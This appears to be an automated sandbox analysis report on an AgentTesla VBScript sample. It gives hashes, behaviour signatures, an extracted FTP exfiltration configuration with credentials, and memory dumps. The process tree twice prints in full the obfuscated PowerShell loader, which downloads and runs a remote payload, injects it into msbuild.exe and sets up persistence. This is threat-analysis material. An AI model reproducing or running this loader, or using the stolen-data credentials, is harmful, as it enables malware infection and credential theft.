Analysis

  • max time kernel
    148s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2023 02:00

General

  • Target

    3.vbs

  • Size

    241KB

  • MD5

    24f7db07213c00b85854d513b3a8061a

  • SHA1

    566085ff56c9c111a58e0f2a61fcdaaf49426143

  • SHA256

    1c8ba53a0df3d48bd031a348f36b5d75ac78db8d94987a3368a9c49429b47222

  • SHA512

    2efefddb776099f698b32d7fd5c41ee644cbc4e0994f849b3f8ecafed674344ce7396212e778d2fc62f17b5343787555ed52b76af6361fe4736d712be90b3a8e

  • SSDEEP

    6144:BBruKFNkrk8eN399bE58UDMrlxuXXhT2K:Brqo8eNIDuDu1N

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.cefin.bg
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    #UuXy?6cIbL+

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Dinarerne9 ($Ensproglig){$Nringsvirksomhedernes = $Ensproglig.Length-1; For ($Smiths211=6; $Smiths211 -lt $Nringsvirksomhedernes){$Malice=$Malice+$Ensproglig.Substring( $Smiths211, 1);$Smiths211+=7;}$Malice;}$Opspyttets=Dinarerne9 ' OutquhRendettHypermtSerianpImport:Maskin/Custom/ HovedlChargfeFinindstransfhAsbesta UnorinOpsangr RelatehanebeiRamotedTuvalu.DevolvcPrograoSubvenmRosenk/ Klapp1Dreadl3Focusa2alliss9Flyveb0Admira1semina1 Foreg0Convin9Rivale6 Pseud/TermoeGBlokkroEvalueoUtilnrd SammehSnjasiuAntikomEuryphoKirkebrDuksspeBrithkdbidronnbentine KourosEtymolsDactyl. AperidLnskaleGraalapCriticlPolyhyoLalledySljdsj ';$Malice01=Dinarerne9 ' Ogresi GrundeForgrexPsychi ';$Dinkies = Dinarerne9 'Heroer\KlftersOutsavyBussensUdkikswSkydevodownliw Konto6 Langu4Cinura\KvartsWnationi AntifnUdparcdBlokopoCornetwBalancsPrepurP CirkuoAcquirwPerifeeEuryzyrSpagetSPhosphhLaceieeInderelFedtlalDiphos\MassagvRawhid1Babyra.Spisek0Cotang\EsprespKomposoAnaerowEpauleeSkankerAxemensAntilihBarbwieOligosl TakstlUnders.Spritbe Forehx Dyscre Medle ';. ($Malice01) (Dinarerne9 'Overbo$TingesRAnabapefalxpagoversorSpeciae Brylls TurinsOverteiCirrosoOlddann Outch2Rhagon=Parcid$Prospee SundenAshkenvMilieu:TallitwGebrokiSwatchn AfsbndbabbitiCtenoprPricel ') ;& ($Malice01) (Dinarerne9 ' Baria$ForritD Tormiithrombn PaybakKyklopistrutseTrimemsbonnie=Obolar$VineyaR FilureFleksigSeptenrSelekteDieselsPrylersStatariBanneroAntracnAfkryd2Perver+Erstat$AnatheDMiljmiiReplevn SigtvktjekkoiUlykkeeKetchusMudlar ') ;& ($Malice01) (Dinarerne9 'Nigeri$Decathd Concei MacrosOveredsBewhiso OverscMiscasiNonpara MellebVeritil LaskeyTrestr Chimae=Aimime Renite(Unawak(HandlegKalkylwincourm HospiiAntnde AdifowUnsubsiFoertenIlgnin3Mejeri2Avecen_ StaalpSlibrir caeloo Cacotc uropheAttraksMargars Sully Mesqui-PostsyFSuffls computP BldterAmatrooRechanc EisodeBergensSlutstsDaddelIMyresyd Trbls= Victi$Slaask{SemibaPBlomstIOpgiveDDevalm}Semian)Unfamo. DrostCKededeoSkyggemLrerigm Crudda RavinnDecoagdSkistaLKraveliSaoshynGleirreNephom) Holan Tooth-ForstasSammenpArbejdlFluotii UnleatTangor Trolde[UdeladcHjemmehHestesaUdgrftr Lokal] Ternr3Reelfu4desint ');. ($Malice01) (Dinarerne9 ' Bagat$ DetruSSlotspc ParenhGranuloOncettrRudeskl SmartaSatyrscSejrsbeMetabooTammesucircumsDeanss6Visnin9 Provi Cricet=belysn ramask$ KaraydPosernikatteksDisquisKulrenoReplikc Efteri GraahaMonoptbArninglforlysy Carit[Halfli$ForgledkodeopiOsculasanoxaesHarekioBehowlcAsteniiCretinaPeptonbHatabllCorticyMedlem.InteracConcuroSveneguPredetn Undert Unpil-Couddr2Carbet] Lysfo ');& ($Malice01) (Dinarerne9 'acerba$ PeculO tvindvLicentepredetrImperibPrferea NegrolLftestaUnslyln SandscUdretneLanuginRigsads Melod=Lysint(CarewoT HusteePantomsIndstitBardes-EftersPRgsudfaArculatUnminehUnwide Filode$gersalD MesmeiYoursenLarvefkAbsumpi FordoeInstrusTvrsum) Hospi Wayser- HalvsA ArmodnKeepsadBagstv Lyrica(Zodiac[ AfbetIInvarinYppigrtRetsviP SkilltIndtegrArchex]Kolest: Konke:VintersStenceiFlagsszHomoloeTermoe Regene-hovedoeRubiouqSkunke keyboa8Deadme)Transl ') ;if ($Overbalancens) {& $Dinkies $Schorlaceous69;} else {;$Malice00=Dinarerne9 'StreetS RyatptglosefaKondemrCorpultChatte-operatBSuffraiflypirt Foress RedigTSupercr AmalgaBrofagnDynelfsAlderwfBandlye ForburStayer Harpun-AtioneSFnomenoOsteriuFesttar Saerlc RainieFugler Wouhle$ClysteOMagyarp kindlsIntenspFiskefy UndsetsmertetNonfuge JoctetBetnknsVurder Ejend-InbuilDKalkule Tyrans GudestProceni PrsidnIsosulaDaoinetAutomaiPladevoRekreanIdenti Catal$ GymnoRRetteleNeuralg Cosinr DisineIagttasPrograspresopiSigrido Prisensulpho2Pukkel ';& ($Malice01) (Dinarerne9 'Transi$ UnralR Endemetarting UndrarStephaePrferesKalifasKartogiGestikoMarkrfn Becal2Undsel=Dialys$ JonoseEjectonPrtendv Preca: Tersua UnrefpPraefepRaadyrdUnpagiaargeret Aerosa edito ') ;. ($Malice01) (Dinarerne9 'selvanI ExponmOutdazpBillagoMarkprrPanatrtZeaxan- melenMKajakko AmphiddiscipuSympatlMiniume Perih SakramBRetiesiDiskoft Chteas UnshaTDyesturSepareaTuttenndownswsLeptomfKonfusefoveolrTvangs ') ;$Regression2=$Regression2+'\Sskendeflok.Syn';while (-not $Recapitulationist159) {.($Malice01) (Dinarerne9 'Servin$UngelaRGentleeGlutitcIndsigaRahanwpMedeafiRidebatViciouucanzonl AdminaRembratHichupiOpvarmoRockabn FluefiSpekulsKassantbombek1Forhre5 Beton9Muscal= Salgs(BeboelTHenfale Debaus RhadatOrangu-AvnbgePMarineaDelatetPodocahtoptek Planlg$MagistRVidimueuopmrkg Patrir catere syltesslittesDramseiSangeroAnalysnUopska2Sandsl)Talkol ') ;& ($Malice01) $Malice00;& ($Malice01) (Dinarerne9 'SixtusSMavedet SicklaAmpullrAllotrtOnaner-TameabS Allikl JomfreEuropaeMagnanpHerdsm Purpos5Faktot ');}& ($Malice01) (Dinarerne9 'Bygger$SeigneDRensniiRepuncnKandidavanuatrVentrieNydelirPerfeknInfitleSkovma Boroni=watchw ochrojGVegetaeLnkonttCovete-RetssaCAntikooUnbrignAskesutSuperceLorettnSaranktPulver Natura$MalleiRBallereRodfung KoagurVrkstee udviksLaasens afnatiCardigo Tempen Hecat2Astroh ');. ($Malice01) (Dinarerne9 'Lactar$Adjutesmicrosg CounteTilkenrBenspns Smrer fordr=Calcin Narcis[ NaaleSTerninyStorkbsHeerastEpistyeBeduinmSesqui. RiddeC PaataoElsklinForaadvLuridneApposir Taagethairbr]Antipr:Forjud:HelautFPudersrOversioDinitrmHomeriBrullesaStuegasBoligbeGastro6 autod4 EgotrSErotomt SkiftrEphthai FinlanPrefrag Dissh(vektor$ SalutDForlseitekstbnEupepta SnitcrMemphieCycaserRoadblnDissymeBrakke)Japans ');& ($Malice01) (Dinarerne9 'Stuefl$LuftpuMFortunaKoketplTeutopiMisantcBordeneProsec2Dkspla Viking=Sortme Kaean[SupineSExclaiySlarafsInterltEsotroeParascmKonkur.SkriveTIngolfeChilacx demultMonoxy.SlutorEDukkenn AcinecFremdroanonandIntrotiUdpibnn LagengLitkas]Stikin: Rener:depravA CauruSArchesCOverbeIMajonsIMotaci. CaptaGTangkaekondistBorgerSSulsgrtTilkenrUngkariDepilanPurflegGennem(Ischio$Semiols SpgefgUnmysteIndignrBataljsFrdsel) Lihya ');& ($Malice01) (Dinarerne9 ' Elast$MithanBGulageoFanientNettovt LymphlKogeple BayonbStrongrPreenauPlatyksStninghBurgla=Lreaar$SmasksMPsychoa GlycolPartisiUdflugc DipneeRakans2Tirsda. CommisEyelesuSpiculbdiaposs ColoptTetramrSoffici Absorn Enqueg Rabbi(Genfor2 Untid8Jackpo4 Ghost2Cabbed1Foxter7Trusse, Vande2Overhr7Bitume5Retran2Davren5Bokser)Pinage ');. ($Malice01) $Bottlebrush;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2580
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Dinarerne9 ($Ensproglig){$Nringsvirksomhedernes = $Ensproglig.Length-1; For ($Smiths211=6; $Smiths211 -lt $Nringsvirksomhedernes){$Malice=$Malice+$Ensproglig.Substring( $Smiths211, 1);$Smiths211+=7;}$Malice;}$Opspyttets=Dinarerne9 ' OutquhRendettHypermtSerianpImport:Maskin/Custom/ HovedlChargfeFinindstransfhAsbesta UnorinOpsangr RelatehanebeiRamotedTuvalu.DevolvcPrograoSubvenmRosenk/ Klapp1Dreadl3Focusa2alliss9Flyveb0Admira1semina1 Foreg0Convin9Rivale6 Pseud/TermoeGBlokkroEvalueoUtilnrd SammehSnjasiuAntikomEuryphoKirkebrDuksspeBrithkdbidronnbentine KourosEtymolsDactyl. AperidLnskaleGraalapCriticlPolyhyoLalledySljdsj ';$Malice01=Dinarerne9 ' Ogresi GrundeForgrexPsychi ';$Dinkies = Dinarerne9 'Heroer\KlftersOutsavyBussensUdkikswSkydevodownliw Konto6 Langu4Cinura\KvartsWnationi AntifnUdparcdBlokopoCornetwBalancsPrepurP CirkuoAcquirwPerifeeEuryzyrSpagetSPhosphhLaceieeInderelFedtlalDiphos\MassagvRawhid1Babyra.Spisek0Cotang\EsprespKomposoAnaerowEpauleeSkankerAxemensAntilihBarbwieOligosl TakstlUnders.Spritbe Forehx Dyscre Medle ';. ($Malice01) (Dinarerne9 'Overbo$TingesRAnabapefalxpagoversorSpeciae Brylls TurinsOverteiCirrosoOlddann Outch2Rhagon=Parcid$Prospee SundenAshkenvMilieu:TallitwGebrokiSwatchn AfsbndbabbitiCtenoprPricel ') ;& ($Malice01) (Dinarerne9 ' Baria$ForritD Tormiithrombn PaybakKyklopistrutseTrimemsbonnie=Obolar$VineyaR FilureFleksigSeptenrSelekteDieselsPrylersStatariBanneroAntracnAfkryd2Perver+Erstat$AnatheDMiljmiiReplevn SigtvktjekkoiUlykkeeKetchusMudlar ') ;& ($Malice01) (Dinarerne9 'Nigeri$Decathd Concei MacrosOveredsBewhiso OverscMiscasiNonpara MellebVeritil LaskeyTrestr Chimae=Aimime Renite(Unawak(HandlegKalkylwincourm HospiiAntnde AdifowUnsubsiFoertenIlgnin3Mejeri2Avecen_ StaalpSlibrir caeloo Cacotc uropheAttraksMargars Sully Mesqui-PostsyFSuffls computP BldterAmatrooRechanc EisodeBergensSlutstsDaddelIMyresyd Trbls= Victi$Slaask{SemibaPBlomstIOpgiveDDevalm}Semian)Unfamo. DrostCKededeoSkyggemLrerigm Crudda RavinnDecoagdSkistaLKraveliSaoshynGleirreNephom) Holan Tooth-ForstasSammenpArbejdlFluotii UnleatTangor Trolde[UdeladcHjemmehHestesaUdgrftr Lokal] Ternr3Reelfu4desint ');. ($Malice01) (Dinarerne9 ' Bagat$ DetruSSlotspc ParenhGranuloOncettrRudeskl SmartaSatyrscSejrsbeMetabooTammesucircumsDeanss6Visnin9 Provi Cricet=belysn ramask$ KaraydPosernikatteksDisquisKulrenoReplikc Efteri GraahaMonoptbArninglforlysy Carit[Halfli$ForgledkodeopiOsculasanoxaesHarekioBehowlcAsteniiCretinaPeptonbHatabllCorticyMedlem.InteracConcuroSveneguPredetn Undert Unpil-Couddr2Carbet] Lysfo ');& ($Malice01) (Dinarerne9 'acerba$ PeculO tvindvLicentepredetrImperibPrferea NegrolLftestaUnslyln SandscUdretneLanuginRigsads Melod=Lysint(CarewoT HusteePantomsIndstitBardes-EftersPRgsudfaArculatUnminehUnwide Filode$gersalD MesmeiYoursenLarvefkAbsumpi FordoeInstrusTvrsum) Hospi Wayser- HalvsA ArmodnKeepsadBagstv Lyrica(Zodiac[ AfbetIInvarinYppigrtRetsviP SkilltIndtegrArchex]Kolest: Konke:VintersStenceiFlagsszHomoloeTermoe Regene-hovedoeRubiouqSkunke keyboa8Deadme)Transl ') ;if ($Overbalancens) {& $Dinkies $Schorlaceous69;} else {;$Malice00=Dinarerne9 'StreetS RyatptglosefaKondemrCorpultChatte-operatBSuffraiflypirt Foress RedigTSupercr AmalgaBrofagnDynelfsAlderwfBandlye ForburStayer Harpun-AtioneSFnomenoOsteriuFesttar Saerlc RainieFugler Wouhle$ClysteOMagyarp kindlsIntenspFiskefy UndsetsmertetNonfuge JoctetBetnknsVurder Ejend-InbuilDKalkule Tyrans GudestProceni PrsidnIsosulaDaoinetAutomaiPladevoRekreanIdenti Catal$ GymnoRRetteleNeuralg Cosinr DisineIagttasPrograspresopiSigrido Prisensulpho2Pukkel ';& ($Malice01) (Dinarerne9 'Transi$ UnralR Endemetarting UndrarStephaePrferesKalifasKartogiGestikoMarkrfn Becal2Undsel=Dialys$ JonoseEjectonPrtendv Preca: Tersua UnrefpPraefepRaadyrdUnpagiaargeret Aerosa edito ') ;. ($Malice01) (Dinarerne9 'selvanI ExponmOutdazpBillagoMarkprrPanatrtZeaxan- melenMKajakko AmphiddiscipuSympatlMiniume Perih SakramBRetiesiDiskoft Chteas UnshaTDyesturSepareaTuttenndownswsLeptomfKonfusefoveolrTvangs ') ;$Regression2=$Regression2+'\Sskendeflok.Syn';while (-not $Recapitulationist159) {.($Malice01) (Dinarerne9 'Servin$UngelaRGentleeGlutitcIndsigaRahanwpMedeafiRidebatViciouucanzonl AdminaRembratHichupiOpvarmoRockabn FluefiSpekulsKassantbombek1Forhre5 Beton9Muscal= Salgs(BeboelTHenfale Debaus RhadatOrangu-AvnbgePMarineaDelatetPodocahtoptek Planlg$MagistRVidimueuopmrkg Patrir catere syltesslittesDramseiSangeroAnalysnUopska2Sandsl)Talkol ') ;& ($Malice01) $Malice00;& ($Malice01) (Dinarerne9 'SixtusSMavedet SicklaAmpullrAllotrtOnaner-TameabS Allikl JomfreEuropaeMagnanpHerdsm Purpos5Faktot ');}& ($Malice01) (Dinarerne9 'Bygger$SeigneDRensniiRepuncnKandidavanuatrVentrieNydelirPerfeknInfitleSkovma Boroni=watchw ochrojGVegetaeLnkonttCovete-RetssaCAntikooUnbrignAskesutSuperceLorettnSaranktPulver Natura$MalleiRBallereRodfung KoagurVrkstee udviksLaasens afnatiCardigo Tempen Hecat2Astroh ');. ($Malice01) (Dinarerne9 'Lactar$Adjutesmicrosg CounteTilkenrBenspns Smrer fordr=Calcin Narcis[ NaaleSTerninyStorkbsHeerastEpistyeBeduinmSesqui. RiddeC PaataoElsklinForaadvLuridneApposir Taagethairbr]Antipr:Forjud:HelautFPudersrOversioDinitrmHomeriBrullesaStuegasBoligbeGastro6 autod4 EgotrSErotomt SkiftrEphthai FinlanPrefrag Dissh(vektor$ SalutDForlseitekstbnEupepta SnitcrMemphieCycaserRoadblnDissymeBrakke)Japans ');& ($Malice01) (Dinarerne9 'Stuefl$LuftpuMFortunaKoketplTeutopiMisantcBordeneProsec2Dkspla Viking=Sortme Kaean[SupineSExclaiySlarafsInterltEsotroeParascmKonkur.SkriveTIngolfeChilacx demultMonoxy.SlutorEDukkenn AcinecFremdroanonandIntrotiUdpibnn LagengLitkas]Stikin: Rener:depravA CauruSArchesCOverbeIMajonsIMotaci. CaptaGTangkaekondistBorgerSSulsgrtTilkenrUngkariDepilanPurflegGennem(Ischio$Semiols SpgefgUnmysteIndignrBataljsFrdsel) Lihya ');& ($Malice01) (Dinarerne9 ' Elast$MithanBGulageoFanientNettovt LymphlKogeple BayonbStrongrPreenauPlatyksStninghBurgla=Lreaar$SmasksMPsychoa GlycolPartisiUdflugc DipneeRakans2Tirsda. CommisEyelesuSpiculbdiaposs ColoptTetramrSoffici Absorn Enqueg Rabbi(Genfor2 Untid8Jackpo4 Ghost2Cabbed1Foxter7Trusse, Vande2Overhr7Bitume5Retran2Davren5Bokser)Pinage ');. ($Malice01) $Bottlebrush;}"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2676
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
          4⤵
          • Adds Run key to start application
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2684

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UPNO8JOV47SDXPVE37F9.temp

    Filesize

    7KB

    MD5

    3de1488f4367cad8aba98f0e8c9946fd

    SHA1

    c16e5568a9bda211d544f040fcd8e6936fda37c4

    SHA256

    9ed115867af3ad8b648dd72bc1dd8a52ed7227d7c9faf2e2d3e7dc38ed8eb8db

    SHA512

    834698fef1bd11dc143586fbc908d726f14ca75c8c3455f47020e658b1ae791e005529ceb115eed5b5d2e15b9af4366edd427cda34044d81a63ede1b2ba63805

  • memory/2580-30-0x0000000002820000-0x00000000028A0000-memory.dmp

    Filesize

    512KB

  • memory/2580-29-0x0000000002820000-0x00000000028A0000-memory.dmp

    Filesize

    512KB

  • memory/2580-7-0x0000000002820000-0x00000000028A0000-memory.dmp

    Filesize

    512KB

  • memory/2580-31-0x0000000002820000-0x00000000028A0000-memory.dmp

    Filesize

    512KB

  • memory/2580-9-0x0000000002820000-0x00000000028A0000-memory.dmp

    Filesize

    512KB

  • memory/2580-10-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-11-0x0000000002820000-0x00000000028A0000-memory.dmp

    Filesize

    512KB

  • memory/2580-44-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-28-0x0000000002820000-0x00000000028A0000-memory.dmp

    Filesize

    512KB

  • memory/2580-6-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-5-0x0000000002290000-0x0000000002298000-memory.dmp

    Filesize

    32KB

  • memory/2580-8-0x0000000002820000-0x00000000028A0000-memory.dmp

    Filesize

    512KB

  • memory/2580-27-0x000007FEF5650000-0x000007FEF5FED000-memory.dmp

    Filesize

    9.6MB

  • memory/2580-4-0x000000001B3D0000-0x000000001B6B2000-memory.dmp

    Filesize

    2.9MB

  • memory/2676-15-0x0000000073480000-0x0000000073A2B000-memory.dmp

    Filesize

    5.7MB

  • memory/2676-32-0x0000000005180000-0x0000000005181000-memory.dmp

    Filesize

    4KB

  • memory/2676-17-0x0000000000500000-0x0000000000540000-memory.dmp

    Filesize

    256KB

  • memory/2676-16-0x0000000000500000-0x0000000000540000-memory.dmp

    Filesize

    256KB

  • memory/2676-14-0x0000000073480000-0x0000000073A2B000-memory.dmp

    Filesize

    5.7MB

  • memory/2676-34-0x0000000073480000-0x0000000073A2B000-memory.dmp

    Filesize

    5.7MB

  • memory/2676-35-0x0000000000500000-0x0000000000540000-memory.dmp

    Filesize

    256KB

  • memory/2676-37-0x0000000077440000-0x00000000775E9000-memory.dmp

    Filesize

    1.7MB

  • memory/2676-39-0x0000000077630000-0x0000000077706000-memory.dmp

    Filesize

    856KB

  • memory/2676-33-0x00000000063E0000-0x000000000B694000-memory.dmp

    Filesize

    82.7MB

  • memory/2684-41-0x000000006F750000-0x00000000707B2000-memory.dmp

    Filesize

    16.4MB

  • memory/2684-42-0x000000006F750000-0x00000000707B2000-memory.dmp

    Filesize

    16.4MB

  • memory/2684-43-0x0000000000A20000-0x0000000005CD4000-memory.dmp

    Filesize

    82.7MB

  • memory/2684-40-0x0000000077440000-0x00000000775E9000-memory.dmp

    Filesize

    1.7MB

  • memory/2684-45-0x0000000072C50000-0x000000007333E000-memory.dmp

    Filesize

    6.9MB

  • memory/2684-46-0x000000006F750000-0x000000006F790000-memory.dmp

    Filesize

    256KB

  • memory/2684-47-0x0000000021DB0000-0x0000000021DF0000-memory.dmp

    Filesize

    256KB

  • memory/2684-49-0x0000000077440000-0x00000000775E9000-memory.dmp

    Filesize

    1.7MB

  • memory/2684-52-0x0000000072C50000-0x000000007333E000-memory.dmp

    Filesize

    6.9MB